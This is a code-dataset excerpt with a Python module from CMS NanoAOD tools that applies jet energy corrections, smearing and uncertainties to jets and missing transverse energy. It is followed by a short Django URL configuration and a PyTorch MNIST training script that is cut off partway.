Adapted from\n# nanoAOD-tools/python/postprocessing/modules/jme/jetmetUncertainties.py\n# https://github.com/cms-nanoAOD/nanoAOD-tools/blob/master/python/postprocessing/modules/jme/jetmetUncertainties.py\n# https://github.com/cms-nanoAOD/nanoAOD-tools/blob/master/python/postprocessing/modules/jme/jetRecalib.py (data)\nfrom corrections import modulepath, ensureFile\nfrom ROOT import gSystem, TLorentzVector, vector, JetCorrectorParameters, JetCorrectionUncertainty, FactorizedJetCorrector\nimport math, os, glob, tarfile, tempfile\nimport numpy as np\nfrom math import sqrt, atan2, cos, sin\nfrom JetCalibrationTool import JetReCalibrator\nfrom JetSmearingTool import JetSmearer\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object\nfrom PhysicsTools.NanoAODTools.postprocessing.tools import matchObjectCollection, matchObjectCollectionMultiple\npathJME = os.environ['CMSSW_BASE'] + \"/src/PhysicsTools/NanoAODTools/data/jme/\"\npathJME_local = modulepath+\"/jetMET/\"\n\n\n\ndef ensureJMEFiles(globalTag,path=None,tarbalpath=pathJME_local,JER=False):\n \"\"\"Help function to ensure the JEC files are available in a given path. If not, look for a tar ball.\"\"\"\n # https://twiki.cern.ch/twiki/bin/view/CMS/JECDataMC\n # https://github.com/cms-jet/JECDatabase/raw/master/tarballs/\n # https://twiki.cern.ch/twiki/bin/view/CMS/JetResolution\n # https://github.com/cms-jet/JRDatabase/tree/master/textFiles/\n \n if path==None:\n path = os.path.join(tarbalpath,globalTag)\n \n # CHECK if txt files are already there\n if os.path.exists(path):\n if JER:\n files_sf_txt = glob.glob(os.path.join(path,globalTag+\"*_SF_*.txt\"))\n files_res_txt = glob.glob(os.path.join(path,globalTag+\"*Resolution_*.txt\"))\n if len(files_sf_txt)>=1 and len(files_res_txt)>=3:\n return path\n else:\n files_jes_txt = glob.glob(os.path.join(path,\"*_L[123]*.txt\"))\n files_unc_txt = glob.glob(os.path.join(path,\"*_Uncertainty*.txt\"))\n if len(files_jes_txt)>=6 and len(files_unc_txt)>=2:\n return path\n else:\n os.makedirs(path)\n \n # CHECK for tarball and extract to directory\n tarbalpath = pathJME_local\n for ext in [\".tar.gz\",\".tgz\"]:\n files_tgz = glob.glob(os.path.join(tarbalpath+globalTag+ext))\n if len(files_tgz)>0:\n tarfilename = files_tgz[0]\n print(\"Extracting %s to %s...\"%(tarfilename,path))\n archive = tarfile.open(tarfilename, \"r:gz\")\n archive.extractall(path)\n return path\n \n #path_JEC = tempfile.mkdtemp()\n #jesArchive = tarfile.open(pathJME+globalTag+\".tgz\", \"r:gz\")\n #jesArchive.extractall(path_JEC)\n #return path_JEC\n \n url = \"https://github.com/cms-jet/JRDatabase/tree/master/textFiles/\" if JER else \"https://github.com/cms-jet/JECDatabase/raw/master/tarballs/\"\n raise OSError(\"ensureJECFiles: did not find txt files or tarball for global tag in '%s'! Check %s\"%(globalTag,url))\n return None\n \n\n\nclass JetMETCorrectionTool:\n \"\"\"Class to apply jet/MET corrections on an event-by-event basis.\"\"\"\n \n def __init__(self, year, **kwargs):\n \n #--------------------------------------------------------------------------------------------\n # CV: globalTag and jetType not yet used, as there is no consistent set of txt files for\n # JES uncertainties and JER scale factors and uncertainties yet\n #--------------------------------------------------------------------------------------------\n \n globalTag = kwargs.get('globalTag', None )\n globalTag_JER = kwargs.get('globalTag_JER', None )\n globalTag_JES = kwargs.get('globalTag_JES', globalTag )\n jetType = kwargs.get('jet', 'AK4PFchs' )\n metType = kwargs.get('met', 'MET' )\n isData = kwargs.get('data', False )\n era = kwargs.get('era', \"\" ) # for data; A, B, C, D, ...\n redoJEC = kwargs.get('redoJEC', True )\n doJER = kwargs.get('smear', not isData ) and not isData\n doSystematics = kwargs.get('systematics', True ) and not isData\n noGroom = kwargs.get('noGroom', True )\n jesUncertainties = kwargs.get('uncertainties', ['Total'] if doSystematics else [ ] )\n updateEvent = kwargs.get('updateEvent', False ) # unreliable...\n correctSeparate = kwargs.get('correctSeparate', False )\n \n jetTypes = ['AK4PFchs','AK4PFPuppi','AK8PFchs','AK8PFPuppi']\n assert year in [2016,2017,2018], \"JetMETCorrectionTool: You must choose a year from: 2016, 2017, or 2018.\"\n assert jetType in jetTypes, \"JetMETCorrectionTool: You must choose a jet type from: %s\"%(', '.join(jetTypes))\n assert all(u in ['Total','All'] for u in jesUncertainties), \"JetMETCorrectionTool: Given uncertainties are %s; must be 'Total' or 'All'!\"%(jesUncertainties)\n \n # TARGET VARIABLES\n if \"AK4\" in jetType:\n self.jetBranchName = 'Jet'\n self.genJetBranchName = 'GenJet'\n self.genSubJetBranchName = None\n self.doGroomed = False\n self.corrMET = True\n elif \"AK8\" in jetType:\n self.jetBranchName = 'FatJet'\n self.subJetBranchName = 'SubJet'\n self.genJetBranchName = 'GenJetAK8'\n self.genSubJetBranchName = 'SubGenJetAK8'\n self.doGroomed = not noGroom\n self.corrMET = False\n else:\n raise ValueError(\"ERROR: Invalid jet type = '%s'!\"%jetType)\n self.metBranchName = metType\n self.rhoBranchName = \"fixedGridRhoFastjetAll\"\n self.jmsVals = [1.00, 0.99, 1.01] # TODO: change to real values\n self.unclEnThreshold = 15. # energy threshold below which jets are considered as \"unclustered energy\"\n # cf. JetMETCorrections/Type1MET/python/correctionTermsPfMetType1Type2_cff.py\n jetSmearer = None\n jmr_vals = [ ]\n \n if isData:\n \n # GLOBAL TAG for JES\n if globalTag==None:\n if year==2016:\n for eraset in ['BCD','EF','GH']:\n if era in eraset: era = eraset\n globalTag = \"Summer16_07Aug2017_V11_DATA\"\n globalTag_JES = \"Summer16_07Aug2017%s_V11_DATA\"%era\n elif year==2017:\n if era in 'DE': era = 'DE'\n globalTag = \"Fall17_17Nov2017_V32_DATA\"\n globalTag_JES = \"Fall17_17Nov2017%s_V32_DATA\"%era\n else:\n era = \"Run\"+era\n globalTag = \"Autumn18_V8_DATA\"\n globalTag_JES = \"Autumn18_%s_V8_DATA\"%era\n \n else:\n \n # GLOBAL TAG for JES\n if globalTag==None:\n if year==2016:\n globalTag = \"Summer16_07Aug2017_V11_MC\" #\"Summer16_23Sep2016V4_MC\"\n elif year==2017:\n globalTag = \"Fall17_17Nov2017_V32_MC\"\n else:\n globalTag = \"Autumn18_V8_MC\"\n globalTag_JES = globalTag\n \n # GLOBAL TAG for JER\n if globalTag_JER==None:\n if year==2016:\n globalTag_JER = \"Summer16_25nsV1_MC\"\n elif year==2017:\n globalTag_JER = \"Fall17_V3_MC\"\n elif year==2018:\n globalTag_JER = \"Autumn18_V1_MC\"\n \n # JERs: https://twiki.cern.ch/twiki/bin/view/CMS/JetWtagging\n if year==2016 or year==2018: #update when 2018 values available\n jmr_vals = [1.00, 1.20, 0.80] # nominal, up, down\n else:\n jmr_vals = [1.09, 1.14, 1.04]\n \n # READ JER uncertainties\n ###if doJER:\n jetSmearer = JetSmearer(globalTag_JER,jetType,systematics=doSystematics,jmr_vals=jmr_vals)\n \n # READ JES\n path_JES = ensureJMEFiles(globalTag)\n \n # REDO JECs\n if redoJEC:\n jetReCalibrator = JetReCalibrator(globalTag_JES,jetType,True,path=path_JES,\n correctSeparate=correctSeparate,correctType1MET=False)\n else:\n jetReCalibrator = None\n \n # LOAD LIBRARIES for accessing JES scale factors and uncertainties from txt files\n for library in [ \"libCondFormatsJetMETObjects\", \"libPhysicsToolsNanoAODTools\" ]:\n if library not in gSystem.GetLibraries():\n print(\"Load Library '%s'\"%library.replace(\"lib\", \"\"))\n gSystem.Load(library)\n \n # READ UNCERTAINTY SOURCE NAMES from the loaded file\n jesUncertainty = { }\n filename_JES = \"\"\n if doSystematics:\n postfix = '' if jesUncertainties==['Total'] else \"Sources\"\n filename_JES = ensureFile(path_JES,\"%s_Uncertainty%s_%s.txt\"%(globalTag,postfix,jetType))\n if jesUncertainties==['All']:\n with open(path_JES+'/'+filename_JES) as file:\n lines = file.read().split(\"\\n\")\n sources = filter(lambda x: x.startswith(\"[\") and x.endswith(\"]\"), lines)\n sources = map(lambda x: x[1:-1], sources)\n jesUncertainties = sources\n \n # CREATE JES uncertainties\n print(\"Loading JES uncertainties from file '%s'...\"%filename_JES)\n #jesUncertainty = JetCorrectionUncertainty(filename_JES)\n # implementation didn't seem to work for factorized JEC, try again another way\n for uncertainty in jesUncertainties:\n unclabel = '' if uncertainty=='Total' and len(jesUncertainties)==1 else uncertainty\n pars = JetCorrectorParameters(filename_JES,unclabel)\n jesUncertainty[uncertainty] = JetCorrectionUncertainty(pars)\n \n self.year = year\n self.globalTag = globalTag\n self.jetType = jetType\n self.metType = metType\n self.isData = isData\n self.era = era\n self.redoJEC = redoJEC\n ###self.doJER = doJER\n self.doSystematics = doSystematics\n self.noGroom = noGroom\n self.updateEvent = updateEvent\n self.jesUncertainties = jesUncertainties # list\n self.jesUncertainty = jesUncertainty # dictionairy\n self.path_JES = path_JES\n self.filename_JES = filename_JES\n self.jmr_vals = jmr_vals\n self.jetSmearer = jetSmearer\n self.jetReCalibrator = jetReCalibrator\n self.correctJetMET = self.correctJetMET_Data if isData else self.correctJetMET_MC\n \n \n def endJob(self):\n ###\"\"\"Clean the temporary directories after the job is finished.\"\"\"\n ###if '/tmp/' in self.path_JES[:5]:\n ### print('JetSmearer.endJob: Removing \"%s\"...'%self.path_JES)\n ### os.rmdir(self.path_JES)\n ###self.jetSmearer.endJob()\n pass\n \n \n def correctJetMET_Data(self, event):\n \"\"\"Process data event.\"\"\"\n ###print \">>> %8s \"%event.event + '-'*80\n \n # NOMINAL VALUES\n jets_pt_nom = [ ]\n if self.corrMET:\n met = Object(event, self.metBranchName)\n met_px_nom, met_py_nom = met.pt*cos(met.phi), met.pt*sin(met.phi)\n \n # APPLY JEC per jet\n jets = Collection(event, self.jetBranchName )\n rho = getattr(event, self.rhoBranchName)\n for jet in jets:\n \n # RAW VALUES\n jet_pt0 = jet.pt\n if hasattr(jet,'rawFactor'):\n jet_pt_raw = jet_pt0 * (1 - jet.rawFactor)\n else:\n jet_pt_raw = -1.0 * jet_pt0 # if factor not present factor will be saved as -1\n \n # CALIBRATE - apply JES corrections\n if self.redoJEC:\n jet_pt_nom, jet_mass_nom = self.jetReCalibrator.correct(jet,rho)\n jet.pt = jet_pt_nom\n jet.mass = jet_mass_nom\n else:\n jet_pt_nom = jet.pt\n jet_mass_nom = jet.mass\n jets_pt_nom.append(jet_pt_nom)\n ###print \"%10.4f %10.4f %10.5f %10.5f\"%(jet_pt_raw,jet_pt_nom,jet.eta,jet.rawFactor)\n ###print \"%10.4f %8.4f %8.4f %10.6f %10.6f\"%(jet_pt_raw, jet_pt0, jet_pt_nom, jet.rawFactor, jet_pt_nom/jet_pt_raw-1.)\n \n #### UPDATE JET in event\n ###if self.updateEvent:\n ### getattr(event,self.jetBranchName+'_pt')[jet._index] = jet_pt_nom\n \n # PROPAGATE JES corrections to MET\n if self.corrMET and jet_pt_nom > self.unclEnThreshold:\n jet_cosPhi = cos(jet.phi)\n jet_sinPhi = sin(jet.phi)\n met_px_nom = met_px_nom - (jet_pt_nom - jet_pt0)*jet_cosPhi\n met_py_nom = met_py_nom - (jet_pt_nom - jet_pt0)*jet_sinPhi\n \n # PREPARE MET for return\n if self.corrMET:\n met_nom = TLorentzVector(met_px_nom,met_py_nom,0,sqrt(met_px_nom**2+met_py_nom**2))\n ###if self.updateEvent:\n ### setattr(event,self.metBranchName+'_pt', met_vars['nom'].Pt())\n ### setattr(event,self.metBranchName+'_phi', met_vars['nom'].Phi())\n return jets_pt_nom, met_nom\n \n return jets_pt_nom\n \n \n \n def correctJetMET_MC(self, event):\n \"\"\"Process event, apply corrections.\"\"\"\n ###print \">>> %8s \"%event.event + '-'*80\n \n ###if self.doGroomed:\n ### subJets = Collection(event, self.subJetBranchName )\n ### genSubJets = Collection(event, self.genSubJetBranchName )\n ### genSubJetMatcher = matchObjectCollectionMultiple( genJets, genSubJets, dRmax=0.8 )\n \n jets_pt_nom = [ ]\n ###jets_mass_nom = [ ]\n if self.doSystematics:\n jets_pt_jerUp = [ ]\n jets_pt_jerDown = [ ]\n jets_pt_jesUp = { }\n jets_pt_jesDown = { }\n ###jets_mass_jerUp = [ ]\n ###jets_mass_jerDown = [ ]\n ###jets_mass_jmrUp = [ ]\n ###jets_mass_jmrDown = [ ]\n ###jets_mass_jesUp = { }\n ###jets_mass_jesDown = { }\n ###jets_mass_jmsUp = [ ]\n ###jets_mass_jmsDown = [ ]\n for uncertainty in self.jesUncertainties:\n jets_pt_jesUp[uncertainty] = [ ]\n jets_pt_jesDown[uncertainty] = [ ]\n ###jets_mass_jesUp[uncertainty] = [ ]\n ###jets_mass_jesDown[uncertainty] = [ ]\n \n if self.corrMET:\n met = Object(event, self.metBranchName)\n met_px, met_py = met.pt*cos(met.phi), met.pt*sin(met.phi)\n met_px_nom, met_py_nom = met_px, met_py\n met_px_jerUp, met_py_jerUp = met_px, met_py\n met_px_jerDown, met_py_jerDown = met_px, met_py\n met_px_jesUp, met_py_jesUp = { }, { }\n met_px_jesDown, met_py_jesDown = { }, { }\n for uncertainty in self.jesUncertainties:\n met_px_jesUp[uncertainty] = met_px\n met_py_jesUp[uncertainty] = met_py\n met_px_jesDown[uncertainty] = met_px\n met_py_jesDown[uncertainty] = met_py\n \n ###if self.doGroomed:\n ### jets_msdcorr_nom = [ ]\n ### if self.doSystematics:\n ### jets_msdcorr_jerUp = [ ]\n ### jets_msdcorr_jerDown = [ ]\n ### jets_msdcorr_jmrUp = [ ]\n ### jets_msdcorr_jmrDown = [ ]\n ### jets_msdcorr_jesUp = { }\n ### jets_msdcorr_jesDown = { }\n ### jets_msdcorr_jmsUp = [ ]\n ### jets_msdcorr_jmsDown = [ ]\n ### for uncertainty in self.jesUncertainties:\n ### jets_msdcorr_jesUp[uncertainty] = [ ]\n ### jets_msdcorr_jesDown[uncertainty] = [ ]\n \n # MATCH reconstructed jets to generator level ones\n # (needed to evaluate JER scale factors and uncertainties)\n jets = Collection(event, self.jetBranchName)\n genJets = Collection(event, self.genJetBranchName)\n rho = getattr(event, self.rhoBranchName)\n pairs = matchObjectCollection(jets, genJets)\n # APPLY JEC per jet\n for jet in jets:\n genJet = pairs[jet]\n \n ###if self.doGroomed:\n ### genGroomedSubJets = genSubJetMatcher[genJet] if genJet!=None else None\n ### genGroomedJet = genGroomedSubJets[0].p4() + genGroomedSubJets[1].p4() if genGroomedSubJets!=None and len(genGroomedSubJets)>=2 else None\n ### if jet.subJetIdx1>=0 and jet.subJetIdx2>=0:\n ### groomedP4 = subJets[ jet.subJetIdx1 ].p4() + subJets[ jet.subJetIdx2].p4()\n ### else:\n ### groomedP4 = None\n \n # RAW VALUES\n jet_pt0 = jet.pt\n ###jet_mass0 = jet.mass\n if hasattr(jet,'rawFactor'):\n jet_pt_raw = jet_pt0 * (1 - jet.rawFactor)\n ###jet_mass_raw = jet.mass * (1 - jet.rawFactor)\n else:\n jet_pt_raw = -1.0 * jet_pt0 # if factor not present factor will be saved as -1\n ###jet_mass_raw = -1.0 * jet.mass\n \n # CALIBRATE - apply JES corrections\n if self.redoJEC:\n jet_pt, jet_mass = self.jetReCalibrator.correct(jet,rho)\n jet.pt = jet_pt\n jet.mass = jet_mass\n else:\n jet_pt = jet.pt\n jet_mass = jet.mass\n \n # SMEAR - apply JER SF\n if self.doSystematics:\n smear_jer, smear_jerUp, smear_jerDown = self.jetSmearer.smearPt(jet,genJet,rho)\n else:\n smear_jer = self.jetSmearer.smearPt(jet,genJet,rho)[0]\n jet_pt_nom = smear_jer*jet_pt\n if jet_pt_nom<0.0:\n jet_pt_nom *= -1.0\n jets_pt_nom.append(jet_pt_nom)\n ###print \"%8.4f %8.4f %8.4f %8.4f %8.4f %8.4f\"%(jet_pt_raw, jet_pt0, jet_pt, jet_pt_nom, jet.rawFactor, smear_jer)\n \n #### SMEAR JMS and JMR scale factors\n ###jmsNomVal = self.jmsVals[0]\n ###jmsDownVal = self.jmsVals[1]\n ###jmsUpVal = self.jmsVals[2]\n ###smear_jmr, smear_jmrUp, smear_jmrDown = self.jetSmearer.smearMass(jet, genJet)\n ###jet_mass_nom = smear_jer*smear_jmr*jmsNomVal*jet.mass\n ###if jet_mass_nom < 0.0:\n ### jet_mass_nom *= -1.0\n ###jets_mass_nom .append(jet_mass_nom)\n \n #### CORRECT GROOMED JETS\n ###if self.doGroomed:\n ### ( jet_msdcorr_jmrNomVal, jet_msdcorr_jmrUpVal, jet_msdcorr_jmrDownVal ) = self.jetSmearer.getSmearValsM(groomedP4, genGroomedJet) if groomedP4!=None and genGroomedJet!=None else (0.,0.,0.)\n ### jet_msdcorr_raw = groomedP4.M() if groomedP4!=None else 0.0\n ### if jet_msdcorr_raw < 0.0:\n ### jet_msdcorr_raw *= -1.0\n ### jet_msdcorr_nom = smear_jer*jet_msdcorr_jmrNomVal*jet_msdcorr_raw\n ### jets_msdcorr_nom .append(jet_msdcorr_nom)\n \n #### UPDATE JET in event (unreliable)\n ###if self.updateEvent:\n ### getattr(event,self.jetBranchName+'_pt')[jet._index] = jet_pt_nom\n ### ###getattr(event,self.jetBranchName+'_mass')[jet._index] = jet_mass_nom\n \n # EVALUATE JEC uncertainties\n if self.doSystematics:\n \n # EVALUATE JES uncertainties\n jet_pt_jesUp = { }\n jet_pt_jesDown = { }\n for uncertainty in self.jesUncertainties:\n # (cf. https://twiki.cern.ch/twiki/bin/view/CMSPublic/WorkBookJetEnergyCorrections#JetCorUncertainties )\n self.jesUncertainty[uncertainty].setJetPt(jet_pt_nom)\n self.jesUncertainty[uncertainty].setJetEta(jet.eta)\n delta = self.jesUncertainty[uncertainty].getUncertainty(True)\n jet_pt_jesUp[uncertainty] = jet_pt_nom*(1.+delta)\n jet_pt_jesDown[uncertainty] = jet_pt_nom*(1.-delta)\n jets_pt_jesUp[uncertainty] .append(jet_pt_jesUp[uncertainty])\n jets_pt_jesDown[uncertainty].append(jet_pt_jesDown[uncertainty])\n ###jet_mass_jesUp [uncertainty] = jet_mass_nom*(1. + delta)\n ###jet_mass_jesDown [uncertainty] = jet_mass_nom*(1. - delta)\n ###jets_mass_jesUp [uncertainty].append(jet_mass_jesUp[uncertainty])\n ###jets_mass_jesDown[uncertainty].append(jet_mass_jesDown[uncertainty])\n ###if self.doGroomed:\n ### jet_msdcorr_jesUp [uncertainty] = jet_msdcorr_nom*(1. + delta)\n ### jet_msdcorr_jesDown [uncertainty] = jet_msdcorr_nom*(1. - delta)\n ### jets_msdcorr_jesUp [uncertainty].append(jet_msdcorr_jesUp[uncertainty])\n ### jets_msdcorr_jesDown[uncertainty].append(jet_msdcorr_jesDown[uncertainty])\n \n # EVALUATE JER uncertainties\n jet_pt_jerUp = smear_jerUp*jet_pt\n jet_pt_jerDown = smear_jerDown*jet_pt\n jets_pt_jerUp .append(jet_pt_jerUp)\n jets_pt_jerDown.append(jet_pt_jerDown)\n \n #### EVALUATE JMS and JMR uncertainties\n ###jet_mass_jesUp = { }\n ###jet_mass_jesDown = { }\n ###jet_mass_jmsUp = [ ]\n ###jet_mass_jmsDown = [ ]\n ###jets_mass_jerUp .append(smear_jerUp *smear_jmr *jmsNomVal *jet.mass)\n ###jets_mass_jerDown.append(smear_jerDown*smear_jmr *jmsNomVal *jet.mass)\n ###jets_mass_jmrUp .append(smear_jer *smear_jmrUp *jmsNomVal *jet.mass)\n ###jets_mass_jmrDown.append(smear_jer *smear_jmrDown*jmsNomVal *jet.mass)\n ###jets_mass_jmsUp .append(smear_jer *smear_jmr *jmsUpVal *jet.mass)\n ###jets_mass_jmsDown.append(smear_jer *smear_jmr *jmsDownVal*jet.mass)\n \n ###if self.doGroomed:\n ### jet_msdcorr_jmsUp = [ ]\n ### jet_msdcorr_jmsDown = [ ]\n ### jet_msdcorr_jesUp = { }\n ### jet_msdcorr_jesDown = { }\n ### jets_msdcorr_jerUp .append(smear_jerUp *jet_msdcorr_jmrNomVal *jmsNomVal *jet_msdcorr_raw)\n ### jets_msdcorr_jerDown.append(smear_jerDown*jet_msdcorr_jmrNomVal *jmsNomVal *jet_msdcorr_raw)\n ### jets_msdcorr_jmrUp .append(smear_jer *jet_msdcorr_jmrUpVal *jmsNomVal *jet_msdcorr_raw)\n ### jets_msdcorr_jmrDown.append(smear_jer *jet_msdcorr_jmrDownVal*jmsNomVal *jet_msdcorr_raw)\n ### jets_msdcorr_jmsUp .append(smear_jer *jet_msdcorr_jmrNomVal *jmsUpVal *jet_msdcorr_raw)\n ### jets_msdcorr_jmsDown.append(smear_jer *jet_msdcorr_jmrNomVal *jmsDownVal *jet_msdcorr_raw)\n \n # PROPAGATE JER and JES corrections and uncertainties to MET\n if self.corrMET and jet_pt_nom > self.unclEnThreshold:\n jet_cosPhi = cos(jet.phi)\n jet_sinPhi = sin(jet.phi)\n ###print \"%8.4f - met_px_nom = met_px_nom - (jet_pt_nom - jet_pt0)*jet_cosPhi = %8.4f - (%8.4f - %8.4f)*%8.4f = %8.4f\"%(jet.phi,met_px_nom,jet_pt_nom,jet_pt0,jet_cosPhi,met_px_nom-(jet_pt_nom-jet_pt0)*jet_cosPhi)\n met_px_nom = met_px_nom - (jet_pt_nom - jet_pt0)*jet_cosPhi\n ###print \"%8.4f - met_py_nom = met_py_nom - (jet_pt_nom - jet_pt0)*jet_sinPhi = %8.4f - (%8.4f - %8.4f)*%8.4f = %8.4f\"%(jet.phi,met_py_nom,jet_pt_nom,jet_pt0,jet_sinPhi,met_py_nom-(jet_pt_nom-jet_pt0)*jet_sinPhi)\n met_py_nom = met_py_nom - (jet_pt_nom - jet_pt0)*jet_sinPhi\n if self.doSystematics:\n met_px_jerUp = met_px_jerUp - (jet_pt_jerUp - jet_pt0)*jet_cosPhi\n met_py_jerUp = met_py_jerUp - (jet_pt_jerUp - jet_pt0)*jet_sinPhi\n met_px_jerDown = met_px_jerDown - (jet_pt_jerDown - jet_pt0)*jet_cosPhi\n met_py_jerDown = met_py_jerDown - (jet_pt_jerDown - jet_pt0)*jet_sinPhi\n for uncertainty in self.jesUncertainties:\n met_px_jesUp[uncertainty] = met_px_jesUp[uncertainty] - (jet_pt_jesUp[uncertainty] - jet_pt0)*jet_cosPhi\n met_py_jesUp[uncertainty] = met_py_jesUp[uncertainty] - (jet_pt_jesUp[uncertainty] - jet_pt0)*jet_sinPhi\n met_px_jesDown[uncertainty] = met_px_jesDown[uncertainty] - (jet_pt_jesDown[uncertainty] - jet_pt0)*jet_cosPhi\n met_py_jesDown[uncertainty] = met_py_jesDown[uncertainty] - (jet_pt_jesDown[uncertainty] - jet_pt0)*jet_sinPhi\n \n #### CHECKS\n ###print \">>> %2d: jet.pt, jet_pt, corr_factor, smear_factor = %8.3f, %8.3f, %8.4f, %8.4f\"%(jet._index,jet.pt,jet_pt,jet_pt/jet_pt_raw,smear_factor)\n ###print \">>> %2s jet_pt_jerUp, jet_pt_nom, jet_pt_jerDown = %8.3f, %8.3f, %8.3f\"%(\"\",jet_pt_jerUp,jet_pt_nom,jet_pt_jerDown)\n ###print \">>> %2s jet_pt_jesUp, jet_pt_nom, jet_pt_jesDown = %8.3f, %8.3f, %8.3f\"%(\"\",jet_pt_jesUp['Total'],jet_pt_nom,jet_pt_jesDown['Total'])\n \n # PREPARE JET PT variations for return; save 'Total' as just jesUp/jesDown\n if self.doSystematics:\n jetpt_vars = { 'nom': jets_pt_nom, 'jerUp': jets_pt_jerUp, 'jerDown': jets_pt_jerDown }\n for uncertainty in self.jesUncertainties:\n jetpt_vars[\"jes%sUp\"%uncertainty.replace('Total','')] = jets_pt_jesUp[uncertainty]\n jetpt_vars[\"jes%sDown\"%uncertainty.replace('Total','')] = jets_pt_jesDown[uncertainty]\n else:\n jetpt_vars = { 'nom': jets_pt_nom, }\n \n if self.corrMET:\n \n # PREPARE MET for return\n ###print \"met_px_nom = %8.4f\"%(met_px_nom)\n ###print \"met_py_nom = %8.4f\"%(met_py_nom)\n met_vars = { 'nom': TLorentzVector(met_px_nom,met_py_nom,0,sqrt(met_px_nom**2+met_py_nom**2)) }\n \n #### UPDATE MET in event\n ###if self.updateEvent:\n ### setattr(event,self.metBranchName+'_pt', met_vars['nom'].Pt())\n ### setattr(event,self.metBranchName+'_phi', met_vars['nom'].Phi())\n \n if self.doSystematics:\n \n # EVALUATE UNCLUSTERED ENERGY uncertainties\n met_deltaPx_unclEn = getattr(event,self.metBranchName+\"_MetUnclustEnUpDeltaX\")\n met_deltaPy_unclEn = getattr(event,self.metBranchName+\"_MetUnclustEnUpDeltaY\")\n met_px_unclEnUp = met_px_nom + met_deltaPx_unclEn\n met_py_unclEnUp = met_py_nom + met_deltaPy_unclEn\n met_px_unclEnDown = met_px_nom - met_deltaPx_unclEn\n met_py_unclEnDown = met_py_nom - met_deltaPy_unclEn\n \n # PREPARE MET variations for return\n met_vars['jesUp'] = { }\n met_vars['jesDown'] = { }\n met_vars['jerUp'] = TLorentzVector(met_px_jerUp, met_py_jerUp, 0,sqrt(met_px_jerUp**2 +met_py_jerUp**2))\n met_vars['jerDown'] = TLorentzVector(met_px_jerDown, met_py_jerDown, 0,sqrt(met_px_jerDown**2 +met_py_jerDown**2))\n met_vars['unclEnUp'] = TLorentzVector(met_px_unclEnUp, met_py_unclEnUp, 0,sqrt(met_px_unclEnUp**2 +met_py_unclEnUp**2))\n met_vars['unclEnDown'] = TLorentzVector(met_px_unclEnDown,met_py_unclEnDown,0,sqrt(met_px_unclEnDown**2+met_py_unclEnDown**2))\n for uncertainty in self.jesUncertainties:\n met_vars[\"jes%sUp\"%uncertainty.replace('Total','')] = TLorentzVector(met_px_jesUp[uncertainty], met_py_jesUp[uncertainty],\n 0,sqrt(met_px_jesUp[uncertainty]**2 +met_py_jesUp[uncertainty]**2))\n met_vars[\"jes%sDown\"%uncertainty.replace('Total','')] = TLorentzVector(met_px_jesDown[uncertainty],met_py_jesDown[uncertainty],\n 0,sqrt(met_px_jesDown[uncertainty]**2+met_py_jesDown[uncertainty]**2))\n \n return jetpt_vars, met_vars\n \n return jetpt_vars\n \n","sub_path":"corrections/JetMETCorrectionTool.py","file_name":"JetMETCorrectionTool.py","file_ext":"py","file_size_in_byte":29193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"271995013","text":"from django.conf.urls import include, url\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'conta_bancaria.views.home', name='home'),\n url(r'^$', 'contas.views.home', name='home'),\n url(r'^contas/$', 'contas.views.contas', name='contas'),\n url(r'^planos/$', 'contas.views.planos', name='planos'),\n url(r'^criar-conta/$', 'contas.views.nova_conta', name='nova_conta'),\n url(r'^criar-plano/$', 'contas.views.novo_plano', name='novo_plano'),\n]\n","sub_path":"contas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"395633631","text":"from __future__ import print_function\nimport torch.nn as nn\nimport csv\nfrom itertools import zip_longest\nimport argparse\nimport torch\nfrom training_routines import train, test\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\n\nclass MnistCNN(nn.Module):\n def __init__(self):\n super(MnistCNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 20, 5, 1)\n self.conv2 = nn.Conv2d(20, 50, 5, 1)\n self.fc1 = nn.Linear(4 * 4 * 50, 500)\n self.fc2 = nn.Linear(500, 10)\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv2(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(-1, 4 * 4 * 50)\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.5, metavar='M',\n help='SGD momentum (default: 0.5)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n\n parser.add_argument('--save-model', action='store_true', default=False,\n help='For Saving the current Model')\n args = parser.parse_args()\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.test_batch_size, shuffle=True, **kwargs)\n\n model = MnistCNN().to(device)\n optimizer = optim.Adam(model.parameters(), lr=args.lr)\n\n test_accuracy = []\n train_accuracy = []\n\n for epoch in range(1, args.epochs + 1):\n train(args, model, device, train_loader, optimizer, epoch)\n test(args, model, device, test_loader, train_loader, test_accuracy, train_accuracy)\n\n d = [train_accuracy, test_accuracy]\n export_data = zip_longest(*d, fillvalue='')\n with open('../model/mnist_cnn_report.csv', 'w', 